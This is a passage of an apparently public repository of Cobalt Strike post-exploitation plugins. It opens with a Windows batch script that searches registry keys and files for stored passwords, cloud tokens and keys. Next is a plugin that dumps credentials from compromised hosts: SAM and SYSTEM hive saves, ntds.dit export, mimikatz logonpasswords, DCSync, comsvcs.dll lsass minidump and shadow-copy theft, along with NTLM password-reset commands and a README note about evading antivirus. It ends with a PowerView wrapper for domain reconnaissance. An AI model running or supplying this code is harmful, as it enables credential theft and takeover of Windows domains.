_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] GPP Password ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 438 | cd "%SystemDrive%\Microsoft\Group Policy\history" 439 | dir /s/b Groups.xml == Services.xml == Scheduledtasks.xml == DataSources.xml == Printers.xml == Drives.xml 440 | cd "%windir%\..\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history" 441 | dir /s/b Groups.xml == Services.xml == Scheduledtasks.xml == DataSources.xml == Printers.xml == Drives.xml 442 | echo. 443 | echo. 444 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Cloud Creds ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 445 | cd "%SystemDrive%\Users" 446 | dir /s/b .aws == credentials == gcloud == credentials.db == legacy_credentials == access_tokens.db == .azure == accessTokens.json == azureProfile.json 447 | cd "%windir%\..\Documents and Settings" 448 | dir /s/b .aws == credentials == gcloud == credentials.db == legacy_credentials == access_tokens.db == .azure == accessTokens.json == azureProfile.json 449 | echo. 450 | echo. 451 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] AppCmd ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 452 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe 453 | IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO %systemroot%\system32\inetsrv\appcmd.exe exists. 454 | echo. 455 | echo. 456 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Files an registry that may contain credentials ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 457 | echo [i] Searching specific files that may contains credentials. 458 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files 459 | echo Looking inside HKCU\Software\ORL\WinVNC3\Password 460 | reg query HKCU\Software\ORL\WinVNC3\Password 2>nul 461 | echo Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password 462 | reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password 2>nul 463 | echo Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon 464 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername" 465 | echo Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP 466 | reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s 2>nul 467 | echo Looking inside HKCU\Software\TightVNC\Server 468 | reg query HKCU\Software\TightVNC\Server 2>nul 469 | echo Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions 470 | reg query HKCU\Software\SimonTatham\PuTTY\Sessions /s 2>nul 471 | echo Looking inside HKCU\Software\OpenSSH\Agent\Keys 472 | reg query HKCU\Software\OpenSSH\Agent\Keys /s 2>nul 473 | cd %USERPROFILE% 2>nul && dir /s/b *password* == *credential* 2>nul 474 | cd ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\.. 475 | dir /s/b /A:-D RDCMan.settings == *.rdg == SCClient.exe == *_history == .sudo_as_admin_successful == .profile == *bashrc == httpd.conf == *.plan == .htpasswd == .git-credentials == *.rhosts == hosts.equiv == Dockerfile == docker-compose.yml == appcmd.exe == TypedURLs == TypedURLsTime == History == Bookmarks == Cookies == "Login Data" == places.sqlite == key3.db == key4.db == credentials == credentials.db == access_tokens.db == accessTokens.json == legacy_credentials == azureProfile.json == unattend.txt == access.log == error.log == *.gpg == *.pgp == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12 == *.der == *.csr == *.cer == known_hosts == id_rsa == id_dsa == *.ovpn == anaconda-ks.cfg == hostapd.conf == rsyncd.conf == cesi.conf == supervisord.conf == tomcat-users.xml == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == unattend.xml == unattended.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == groups.xml == services.xml == scheduledtasks.xml == printers.xml == drives.xml == datasources.xml == php.ini == https.conf == https-xampp.conf == httpd.conf == my.ini == my.cnf == access.log == error.log == server.xml == SiteList.xml == ConsoleHost_history.txt == setupinfo == setupinfo.bak 2>nul | findstr /v ".dll" 476 | cd inetpub 2>nul && (dir /s/b web.config == *.log & cd ..) 477 | echo. 478 | echo. 479 | if "%long%" == "yes" ( 480 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] REGISTRY WITH STRING pass OR pwd ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 481 | reg query HKLM /f passw /t REG_SZ /s 482 | reg query HKCU /f passw /t REG_SZ /s 483 | reg query HKLM /f pwd /t REG_SZ /s 484 | reg query HKCU /f pwd /t REG_SZ /s 485 | echo. 486 | echo. 487 | echo [i] Iterating through the drives 488 | echo. 489 | for /f %%x in ('wmic logicaldisk get name^| more') do ( 490 | set tdrive=%%x 491 | if "!tdrive:~1,2!" == ":" ( 492 | %%x 493 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] FILES THAT CONTAINS THE WORD PASSWORD WITH EXTENSION: .xml .ini .txt *.cfg *.config ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 494 | findstr /s/n/m/i password *.xml *.ini *.txt *.cfg *.config 2>nul | findstr /v /i "\\AppData\\Local \\WinSxS ApnDatabase.xml \\UEV\\InboxTemplates \\Microsoft.Windows.Cloud \\Notepad\+\+\\ vmware cortana alphabet \\7-zip\\" 2>nul 495 | echo. 496 | echo. 497 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] FILES WHOSE NAME CONTAINS THE WORD PASS CRED or .config not inside \Windows\ ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 498 | dir /s/b *pass* == *cred* == *.config* == *.cfg 2>nul | findstr /v /i "\\windows\\" 499 | echo. 500 | echo. 501 | ) 502 | ) 503 | echo. 504 | ) 505 | -------------------------------------------------------------------------------- /lsassdump/README.md: -------------------------------------------------------------------------------- 1 | lsassdump插件 2 | * reg导出SAM 3 | * ntdsutil导出 4 | * mimikatz读取密码 5 | * dcsyncdump 6 | * comsvcsdll_minidump 7 | * vssadmin dump 8 | 9 | 修改用户密码 10 | * setntlm 11 | * changentlm 12 | 13 | 至于杀毒🐎,自己check然后改吧 14 | 15 | ![](img/map.png) 16 | 17 | ![](img/regdump.png) 18 | 19 | ![](img/ntdsutid.png) 20 | 21 | ![](img/dcsync.png) 22 | 23 | ![](img/minidump.png) 24 | 25 | ![](img/vssadmin.png) 26 | 27 | 支持批量操作 28 | 29 | 修改用户密码 30 | ![](img/editpasswd.png) 31 | ![](img/setntlm.png) 32 | -------------------------------------------------------------------------------- /lsassdump/dump.cna: -------------------------------------------------------------------------------- 1 | sub existsadmin{ 2 | if(-isadmin $1){ 3 | btask($1 ,"Dump Lsass Mode:$2 check Administrator Privilege:True"); 4 | return 0; 5 | }else{ 6 | btask($1 ,"Dump Lsass Mode:$2 check Administrator Privilege:False"); 7 | return -1; 8 | } 9 | } 10 | 11 | sub regdump{ 12 | foreach $id ($bid){ 13 | if (existsadmin($id, "regdump") ne -1){ 14 | btask($id, "reg dump SAM,SYSTEM start"); 15 | $outpath = $3["file"]; 16 | bshell($id, "reg save HKLM\\SAM $outpath\\sam /y"); 17 | bshell($id, "reg save HKLM\\SYSTEM $outpath\\system /y"); 18 | bshell($id, "dir $outpath | findstr \"sam\""); 19 | bshell($id, "dir $outpath | findstr \"system\""); 20 | } 21 | } 22 | } 23 | 24 | sub ntdsutildump{ 25 | foreach $id ($bid){ 26 | if (existsadmin($id, "ntdsutildump") ne -1){ 27 | btask($id, "ntdsutil dump ntds.dit、SYSTEM"); 28 | $outpath = $3["file"]; 29 | $outpath2 = $3["file2"]; 30 | brm($id, $outpath); #先删一次文件夹避免报错 31 | bmkdir($id, $outpath); 32 | $cmd = "powershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full ".$outpath."' q q\"&&move /y \"$outpath\\Active Directory\\ntds.dit\" $outpath2\\ntds.dit&&move /y $outpath\\registry\\SECURITY $outpath2\\SECURITY&&move /y $outpath\\registry\\SYSTEM $outpath2\\SYSTEM"; 33 | bshell($id, $cmd); 34 | brm($id, $outpath); 35 | bshell($id, "dir $outpath2 | findstr \"ntds.dit\""); 36 | bshell($id, "dir $outpath2 | findstr \"SECURITY\""); 37 | bshell($id, "dir $outpath2 | findstr \"SYSTEM\""); 38 | } 39 | } 40 | } 41 | 42 | sub regdump_config{ 43 | $dialog = dialog("reg dump hash", %(file => "C:\\Windows\\Temp"), ®dump); 44 | dialog_description($dialog, "reg导出SAM、System,指定save的路径"); 45 | drow_text($dialog, "file", "OutPath:"); 46 | dbutton_action($dialog, "RUN"); 47 | dialog_show($dialog); 48 | } 49 | 50 | sub ntdsutil_config{ 51 | $dialog = dialog("ntdsutildump", %(file => "C:\\Windows\\Temp\\RaidEnMei", file2 => "C:\\Windows\\Temp"), &ntdsutildump); 52 | dialog_description($dialog, "(有域的环境)ntdsutil导出ntds.dit、SYSTEM,指定路径创建并导出(导出的文件夹要求为空)"); 53 | drow_text($dialog, "file", "OutPath:"); 54 | drow_text($dialog, "file2", "OutPath2:"); 55 | dbutton_action($dialog, "RUN"); 56 | dialog_show($dialog); 57 | } 58 | 59 | sub mimikatzlogonpasswords{ 60 | foreach $id ($bid){ 61 | if(existsadmin($id, "mimikatzlogonpasswords") ne -1){ 62 | btask($id, "Mimikatz LogonPassword"); 63 | bmimikatz($id, "sekurlsa::logonpasswords"); 64 | } 65 | } 66 | } 67 | 68 | sub dcsyncdump{ 69 | foreach $id ($bid){ 70 | btask($id, "dcsyncdump"); 71 | if(existsadmin($id, "dcsyncdump") ne -1){ 72 | btask($id, "dcsyncdump"); 73 | $domain = $3["domain"]; 74 | $user = $3["user"]; 75 | if($user eq "ALL"){ 76 | bdcsync($id, $domain); 77 | }else{ 78 | bdcsync($id, $domain, $user); 79 | } 80 | } 81 | } 82 | } 83 | 84 | sub dcsyncdump_config{ 85 | $dialog = dialog("dcsyncdump", %(domain => "RaidEnMei.local", user => "ALL"), &dcsyncdump); 86 | dialog_description($dialog, "(有域的环境)进程dcsync dump [user=ALL dump所有用户 | user=Administrator]"); 87 | drow_text($dialog, "domain", "domain:"); 88 | drow_text($dialog, "user", "user:"); 89 | dbutton_action($dialog, "RUN"); 90 | dialog_show($dialog); 91 | } 92 | 93 | sub minidump{ 94 | $idname = $2; 95 | $savepath = $3; 96 | bps($1, lambda({ 97 | local('$pid $name $entry'); 98 | foreach $entry (split("\n", $2)) { 99 | ($name, $null, $pid) = split("\\s+", $entry); 100 | if ($name eq $idname) { 101 | btask($1, "Find Process: $name $pid"); 102 | bshell($1, "powershell \"rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump $pid $savepath full\""); 103 | bshell($1, "dir $savepath"); 104 | break; 105 | } 106 | } 107 | }, $callback => $2)); 108 | } 109 | 110 | sub comsvcsdll_minidump{ 111 | foreach $id ($bid){ 112 | btask($id, "comsvcs.dll minidump"); 113 | if(existsadmin($id, "comsvcs.dll minidump") ne -1){ 114 | minidump($id, $3["processname"], $3["path"]); 115 | } 116 | } 117 | } 118 | 119 | sub comsvcsdll_minidump_config{ 120 | $dialog = dialog("comsvcsdll_dump", %(path => "C:\\Windows\\Temp\\lsass.dmp", processname => "lsass.exe"), &comsvcsdll_minidump); 121 | dialog_description($dialog, "设置保存dump的路径"); 122 | drow_text($dialog, "processname", "processname:"); 123 | drow_text($dialog, "path", "savepath:"); 124 | dbutton_action($dialog, "RUN"); 125 | dialog_show($dialog); 126 | } 127 | 128 | sub vssadmindump{ 129 | foreach $id ($bid){ 130 | btask($id, "vssadmindump"); 131 | if(existsadmin($id, "vssadmindump") ne -1){ 132 | bshell($id, "wmic shadowcopy call create Volume='C:\\'&&powershell \"\$vpath=vssadmin list shadows | findstr GLOBALROOT;\$path=\$vpath -split ':';\$sampath=-join(\$path[-1].Trim(),'\\Windows\\System32\\config\\sam');\$systempath=-join(\$path[-1].Trim(),'\\Windows\\System32\\config\\system');\$security=-join(\$path[-1].Trim(),'\\Windows\\System32\\config\\security');cmd /c copy \$sampath C:\\Windows\\Temp\\sam /y;cmd /c copy \$systempath C:\\Windows\\Temp\\system /y;cmd /c copy \$security C:\\Windows\\Temp\\security /y;vssadmin delete shadows /for=c: /quiet\""); 133 | bshell($id, "dir C:\\Windows\\Temp | findstr sam"); 134 | bshell($id, "dir C:\\Windows\\Temp | findstr system"); 135 | bshell($id, "dir C:\\Windows\\Temp | findstr security"); 136 | } 137 | } 138 | } 139 | 140 | 141 | sub setntlm_{ 142 | foreach $id ($bid){ 143 | if(-isadmin $id){ 144 | bmimikatz($id, "lsadump::setntlm /server:$3['domain'] /user:$3['user'] /password:$3['password']"); 145 | }else{ 146 | blog2($id, "[-] $id Not Administrator Privilege"); 147 | } 148 | } 149 | } 150 | 151 | sub changentlm_{ 152 | foreach $id ($bid){ 153 | if(-isadmin $id){ 154 | bmimikatz($id, "lsadump::changentlm /server:$3['domain'] /user:$3['user'] /old:$3['old'] /newpassword:$3['newpassword']"); 155 | }else{ 156 | blog2($id, "[-] $id Not Administrator Privilege"); 157 | } 158 | } 159 | } 160 | 161 | sub changentlm2_{ 162 | foreach $id ($bid){ 163 | if(-isadmin $id){ 164 | bmimikatz($id, "lsadump::changentlm /server:$3['domain'] /user:$3['user'] /oldpassword:$3['oldpassword'] /new:$3['newntlm']"); 165 | }else{ 166 | blog2($id, "[-] $id Not Administrator Privilege"); 167 | } 168 | } 169 | } 170 | 171 | 172 | 173 | sub setntlm{ 174 | $dialog = dialog("setntlm" ,%(bid => $bid ,domain => "WORKGROUP" ,user => "Administrator" ,password => "Hxc123456"), &setntlm_); 175 | dialog_description($dialog, "SetNTLM,基本是攻击者拿到较高权限时才会进行的操作,因此主要靠我们前期的一些用户实体行权限要求:用户拥有指定用户的重置密码"); 176 | drow_text($dialog, "user", "user:"); 177 | drow_text($dialog, "domain", "domain:"); 178 | drow_text($dialog, "password", "password:"); 179 | dbutton_action($dialog, "RUN"); 180 | dialog_show($dialog); 181 | } 182 | 183 | sub changentlm{ 184 | $dialog = dialog("changentlm" ,%(bid => $bid ,domain => "WORKGROUP" ,user => "Administrator" ,old => "ca69e7f0f02d9156d1616ba6abd395b6" ,newpassword => "Hxc123456"), &changentlm_); 185 | dialog_description($dialog, "需要对目标用户有Change Password权限,但该权限一般是Everyone拥有的,所以基本上拿到目标用户的hash/密码后都可以进行密码更改"); 186 | drow_text($dialog, "user", "user:"); 187 | drow_text($dialog, "domain", "domain:"); 188 | drow_text($dialog, "old", "oldntlm:"); 189 | drow_text($dialog, "newpassword", "newpassword:"); 190 | dbutton_action($dialog, "RUN"); 191 | dialog_show($dialog); 192 | } 193 | 194 | sub changentlm2{ 195 | $dialog = dialog("changentlm" ,%(bid => $bid ,domain => "WORKGROUP" ,user => "Administrator" ,oldpassword => "Hxc123456!" ,newntlm => "ca69e7f0f02d9156d1616ba6abd395b6"), &changentlm2_); 196 | dialog_description($dialog, "需要对目标用户有Change Password权限,但该权限一般是Everyone拥有的,所以基本上拿到目标用户的hash/密码后都可以进行密码更改"); 197 | drow_text($dialog, "user", "user:"); 198 | drow_text($dialog, "domain", "domain:"); 199 | drow_text($dialog, "oldpassword", "oldpassword:"); 200 | drow_text($dialog, "newntlm", "newntlm:"); 201 | dbutton_action($dialog, "RUN"); 202 | dialog_show($dialog); 203 | } 204 | 205 | 206 | 207 | popup beacon_bottom{ 208 | menu "&dump lsass"{ 209 | $bid = $1; 210 | item "®导出SAM"{ 211 | regdump_config($bid); 212 | } 213 | 214 | item "&ntdsutil导出"{ 215 | ntdsutil_config($bid); 216 | } 217 | 218 | item "&mimikatz读取密码"{ 219 | mimikatzlogonpasswords($bid); 220 | } 221 | 222 | item "&dcsyncdump"{ 223 | dcsyncdump_config($bid); 224 | } 225 | 226 | item "&comsvcsdll_minidump"{ 227 | comsvcsdll_minidump_config($bid); 228 | } 229 | 230 | item "&vssadmin dump"{ 231 | vssadmindump($bid); 232 | } 233 | } 234 | 235 | menu "&修改用户密码"{ 236 | item "&SetNtlm修改账户密码"{ 237 | setntlm($bid); 238 | } 239 | 240 | item "&ChangNtlm修改用户密码"{ 241 | changentlm($bid); 242 | } 243 | 244 | item "&ChangNtlm恢复用户密码"{ 245 | changentlm2($bid); 246 | } 247 | } 248 | } 249 | -------------------------------------------------------------------------------- /lsassdump/img/dcsync.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/lsassdump/img/dcsync.png -------------------------------------------------------------------------------- /lsassdump/img/editpasswd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/lsassdump/img/editpasswd.png -------------------------------------------------------------------------------- /lsassdump/img/map.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/lsassdump/img/map.png -------------------------------------------------------------------------------- /lsassdump/img/minidump.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/lsassdump/img/minidump.png -------------------------------------------------------------------------------- /lsassdump/img/ntdsutid.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/lsassdump/img/ntdsutid.png -------------------------------------------------------------------------------- /lsassdump/img/regdump.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/lsassdump/img/regdump.png -------------------------------------------------------------------------------- /lsassdump/img/setntlm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/lsassdump/img/setntlm.png -------------------------------------------------------------------------------- /lsassdump/img/vssadmin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/lsassdump/img/vssadmin.png -------------------------------------------------------------------------------- /powerview_cs/README.md: -------------------------------------------------------------------------------- 1 | ## powerview ## 2 | 导入PowerView脚本,和常见的功能使用 3 | ``` 4 | powerview-import 1 导入master分支的powerview.ps1 5 | powerview-import 0 导入dev分支的powerview.ps1 6 | ``` 7 | 8 | 集成常见的命令 9 | ``` 10 | Get-NetDomain 获取当前用户所在域的名称 11 | Get-NetUser 获取所有用户的详细信息 12 | Get-NetDomainController 获取所有域控制器的信息 13 | Get-NetComputer 获取域内所有机器的详细信息 14 | Get-NetPrinter 获取域中所有当前计算机对象的数组 15 | Get-NetOU 获取域内的OU信息 16 | Get-NetGroup 获取所有域内组和组成员的信息 17 | Get-NetGroupMember 获取指定域组中所有当前用户的列表 18 | Get-NetFileServer 根据SPN获取当前域使用的文件服务器信息 19 | Get-NetShare 获取当前域内所有的网络共享信息 20 | Get-DFSshare 获取域上所有分发文件系统共享的列表 21 | Get-NetSubnet 获取域的其他网段 22 | Get-NetSite 获取域内的当前站点 23 | Get-NetDomainTrust 获取当前用户域的所有信任 24 | Get-NetForestTrust 获取与当前用户的域关联的林的所有信任 25 | Find-ForeignUser 枚举在其主域之外的组中的用户 26 | Find-ForeignGroup 枚举域组的所有成员并查找查询域之外的用户 27 | Invoke-MapDomainTrust 尝试构建所有域信任的关系映射 28 | Get-NetLoggedon 获取主动登录到指定服务器的用户 29 | Get-NetLocalGroup 获取一个或多个远程主机上本地组的成员 30 | Get-NetSession 获取指定服务器的会话 31 | Get-NetRDPSession 获取指定服务器的远程连接 32 | Get-NetProcess 获取远程主机的进程 33 | Get-UserEvent 获取指定用户的日志 34 | Get-ADObject 获取活动目录的对象 35 | Get-NetGPO 获取域内所有的组策略对象 36 | Get-NetGPOGroup 获取域中设置”受限组”的所有GPO 37 | Find-GPOLocation 获取用户/组,并通过GPO枚举和关联使其具有有效权限的计算机 38 | Find-GPOComputerAdmin 获取计算机并通过GPO枚举确定谁对其具有管理权限 39 | Get-DomainPolicy 获取域默认策略或域控制器策略 40 | Get-DomainSID 返回指定域的SID 41 | Invoke-UserHunter 获取域用户登录的计算机信息及该用户是否有本地管理员权限 42 | Invoke-ProcessHunter 通过查询域内所有的机器进程找到特定用户 43 | Invoke-UserEventHunter 根据用户日志查询某域用户登陆过哪些域机器 44 | Invoke-ShareFinder 在本地域中的主机上查找(非标准)共享 45 | Invoke-FileFinder 在本地域中的主机上查找潜在的敏感文件 46 | Find-LocalAdminAccess 在域上查找当前用户具有本地管理员访问权限的计算机 47 | Find-ManagedSecurityGroups 搜索受管理的活动目录安全组并标识对其具有写访问权限的用户,即这些组拥有添加或删除成员的能力 48 | Get-ExploitableSystem 发现系统可能易受常见攻击 49 | Invoke-EnumerateLocalAdmin 枚举域中所有计算机上本地管理员组的成员 50 | ``` 51 | 52 | ![](img/help.png) 53 | 54 | ![](img/1.png) 55 | 56 | ![](img/2.png) 57 | 58 | ![](img/3.png) 59 | 60 | ![](img/4.png) 61 | 62 | ![](img/5.png) 63 | 64 | ![](img/6.png) 65 | 66 | ![](img/7.png) 67 | -------------------------------------------------------------------------------- /powerview_cs/img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/powerview_cs/img/1.png -------------------------------------------------------------------------------- /powerview_cs/img/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/powerview_cs/img/2.png -------------------------------------------------------------------------------- /powerview_cs/img/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/powerview_cs/img/3.png -------------------------------------------------------------------------------- /powerview_cs/img/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/powerview_cs/img/4.png -------------------------------------------------------------------------------- /powerview_cs/img/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/powerview_cs/img/5.png -------------------------------------------------------------------------------- /powerview_cs/img/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/powerview_cs/img/6.png -------------------------------------------------------------------------------- /powerview_cs/img/7.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/powerview_cs/img/7.jpg -------------------------------------------------------------------------------- /powerview_cs/img/help.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/powerview_cs/img/help.png -------------------------------------------------------------------------------- /powerview_cs/powerview.cna: -------------------------------------------------------------------------------- 1 | ############### 2 | #author:jiushi # 3 | #time:2020/9/30 # 4 | ################# 5 | 6 | alias Get-NetDomain{ 7 | bpowerpick($1, "Get-NetDomain"); 8 | } 9 | 10 | alias Get-NetUser{ 11 | bpowerpick($1, "Get-NetUser"); 12 | } 13 | 14 | alias Get-NetComputer{ 15 | bpowerpick($1, "Get-NetComputer"); 16 | } 17 | 18 | alias Get-NetDomainController{ 19 | bpowerpick($1, "Get-NetDomainController"); 20 | } 21 | 22 | alias Get-NetComputer{ 23 | bpowerpick($1, "Get-NetComputer"); 24 | } 25 | alias Get-NetPrinter{ 26 | bpowerpick($1, "Get-NetPrinter"); 27 | } 28 | alias Get-NetOU{ 29 | bpowerpick($1, "Get-NetOU"); 30 | } 31 | alias Get-NetGroup{ 32 | bpowerpick($1, "Get-NetGroup"); 33 | } 34 | alias Get-NetGroupMember{ 35 | bpowerpick($1, "Get-NetGroupMember"); 36 | } 37 | alias Get-NetFileServer{ 38 | bpowerpick($1, "Get-NetFileServer"); 39 | } 40 | alias Get-NetShare{ 41 | bpowerpick($1, "Get-NetShare"); 42 | } 43 | alias Get-DFSshare{ 44 | bpowerpick($1, "Get-DFSshare"); 45 | } 46 | alias Get-NetSubnet{ 47 | bpowerpick($1, "Get-NetSubnet"); 48 | } 49 | alias Get-NetSite{ 50 | bpowerpick($1, "Get-NetSite"); 51 | } 52 | alias Get-NetDomainTrust{ 53 | bpowerpick($1, "Get-NetDomainTrust"); 54 | } 55 | alias Get-NetForestTrust{ 56 | bpowerpick($1, "Get-NetForestTrust"); 57 | } 58 | alias Find-ForeignUser{ 59 | bpowerpick($1, "Find-ForeignUser"); 60 | } 61 | alias Find-ForeignGroup{ 62 | bpowerpick($1, "Find-ForeignGroup"); 63 | } 64 | alias Invoke-MapDomainTrust{ 65 | bpowerpick($1, "Invoke-MapDomainTrust"); 66 | } 67 | alias Get-NetLoggedon{ 68 | bpowerpick($1, "Get-NetLoggedon"); 69 | } 70 | alias Get-NetLocalGroup{ 71 | bpowerpick($1, "Get-NetLocalGroup"); 72 | } 73 | alias Get-NetSession{ 74 | bpowerpick($1, "Get-NetSession"); 75 | } 76 | alias Get-NetRDPSession{ 77 | bpowerpick($1, "Get-NetRDPSession"); 78 | } 79 | alias Get-NetProcess{ 80 | bpowerpick($1, "Get-NetProcess"); 81 | } 82 | alias Get-UserEvent{ 83 | bpowerpick($1, "Get-UserEvent"); 84 | } 85 | alias Get-ADObject{ 86 | bpowerpick($1, "Get-ADObject"); 87 | } 88 | alias Get-NetGPO{ 89 | bpowerpick($1, "Get-NetGPO"); 90 | } 91 | alias Get-NetGPOGroup{ 92 | bpowerpick($1, "Get-NetGPOGroup"); 93 | } 94 | alias Find-GPOLocation{ 95 | bpowerpick($1, "Find-GPOLocation"); 96 | } 97 | alias Find-GPOComputerAdmin{ 98 | bpowerpick($1, "Find-GPOComputerAdmin"); 99 | } 100 | alias Get-DomainPolicy{ 101 | bpowerpick($1, "Get-DomainPolicy"); 102 | } 103 | alias Get-DomainSID{ 104 | bpowerpick($1, "Get-DomainSID"); 105 | } 106 | alias Invoke-UserHunter{ 107 | bpowerpick($1, "Invoke-UserHunter"); 108 | } 109 | alias Invoke-ProcessHunter{ 110 | bpowerpick($1, "Invoke-ProcessHunter"); 111 | } 112 | alias Invoke-UserEventHunter{ 113 | bpowerpick($1, "Invoke-UserEventHunter"); 114 | } 115 | alias Invoke-ShareFinder{ 116 | bpowerpick($1, "Invoke-ShareFinder"); 117 | } 118 | alias Invoke-FileFinder{ 119 | bpowerpick($1, "Invoke-FileFinder"); 120 | } 121 | alias Find-LocalAdminAccess{ 122 | bpowerpick($1, "Find-LocalAdminAccess"); 123 | } 124 | alias Find-ManagedSecurityGroups{ 125 | bpowerpick($1, "Find-ManagedSecurityGroups"); 126 | } 127 | alias Get-ExploitableSystem{ 128 | bpowerpick($1, "Get-ExploitableSystem"); 129 | } 130 | alias Invoke-EnumerateLocalAdmin{ 131 | bpowerpick($1, "Invoke-EnumerateLocalAdmin"); 132 | } 133 | 134 | 135 | alias powerview-help{ 136 | blog2($1, "本插件集成powerview常用的命令(需要自定义命令的还请powerpick)"); 137 | blog2($1, "powerview-import 导入powerview脚本 (导入分支的时候记得先清空原先导入的)"); 138 | blog2($1, "Get-NetDomain 获取当前用户所在域的名称"); 139 | blog2($1, "Get-NetUser 获取所有用户的详细信息"); 140 | blog2($1, "Get-NetDomainController 获取所有域控制器的信息"); 141 | blog2($1, "Get-NetComputer 获取域内所有机器的详细信息"); 142 | blog2($1, "Get-NetPrinter 获取域中所有当前计算机对象的数组"); 143 | blog2($1, "Get-NetOU 获取域内的OU信息"); 144 | blog2($1, "Get-NetGroup 获取所有域内组和组成员的信息"); 145 | blog2($1, "Get-NetGroupMember 获取指定域组中所有当前用户的列表"); 146 | blog2($1, "Get-NetFileServer 根据SPN获取当前域使用的文件服务器信息"); 147 | blog2($1, "Get-NetShare 获取当前域内所有的网络共享信息"); 148 | blog2($1, "Get-DFSshare 获取域上所有分发文件系统共享的列表"); 149 | blog2($1, "Get-NetSubnet 获取域的其他网段"); 150 | blog2($1, "Get-NetSite 获取域内的当前站点"); 151 | blog2($1, "Get-NetDomainTrust 获取当前用户域的所有信任"); 152 | blog2($1, "Get-NetForestTrust 获取与当前用户的域关联的林的所有信任"); 153 | blog2($1, "Find-ForeignUser 枚举在其主域之外的组中的用户"); 154 | blog2($1, "Find-ForeignGroup 枚举域组的所有成员并查找查询域之外的用户"); 155 | blog2($1, "Invoke-MapDomainTrust 尝试构建所有域信任的关系映射"); 156 | blog2($1, "Get-NetLoggedon 获取主动登录到指定服务器的用户"); 157 | blog2($1, "Get-NetLocalGroup 获取一个或多个远程主机上本地组的成员"); 158 | blog2($1, "Get-NetSession 获取指定服务器的会话"); 159 | blog2($1, "Get-NetRDPSession 获取指定服务器的远程连接"); 160 | blog2($1, "Get-NetProcess 获取远程主机的进程"); 161 | blog2($1, "Get-UserEvent 获取指定用户的日志"); 162 | blog2($1, "Get-ADObject 获取活动目录的对象"); 163 | blog2($1, "Get-NetGPO 获取域内所有的组策略对象"); 164 | blog2($1, "Get-NetGPOGroup 获取域中设置”受限组”的所有GPO"); 165 | blog2($1, "Find-GPOLocation 获取用户/组,并通过GPO枚举和关联使其具有有效权限的计算机"); 166 | blog2($1, "Find-GPOComputerAdmin 获取计算机并通过GPO枚举确定谁对其具有管理权限"); 167 | blog2($1, "Get-DomainPolicy 获取域默认策略或域控制器策略"); 168 | 